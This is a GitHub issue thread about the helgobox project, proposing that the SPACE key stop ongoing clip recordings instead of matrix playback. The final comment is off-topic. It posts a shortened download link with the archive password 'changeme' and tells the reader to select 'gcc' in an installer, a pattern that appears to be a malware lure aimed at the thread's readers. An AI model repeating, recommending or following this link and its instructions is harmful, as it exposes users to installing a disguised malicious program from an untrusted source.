### ISSUE TITLE
Make pressing SPACE keep ongoing clip recordings

### ISSUE THREAD

**Issue by helgoboss** [helgoboss/helgobox#1137]
### Discussed in https://github.com/helgoboss/helgobox/discussions/976

<div type='discussions-op-text'>

<sup>Originally posted by **helgoboss** July 23, 2024</sup>
Copied from YouTube comment https://www.youtube.com/watch?v=_fwTF91YmUU&lc=Ugzm73PnAYXOZDwUzo94AaABAg:

I guess I will go for a "less shortcuts, smart defaults" approach in the beginning. Which means this: Press space = If no clip is recording, stop matrix playback. If at least one clip is recording, trigger recording stop (don't stop matrix playback). This is actually similar to how pressing "Enter" works already for the currently active slot. So space would do the same, but for the complete matrix. Easy to remember.</div>

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
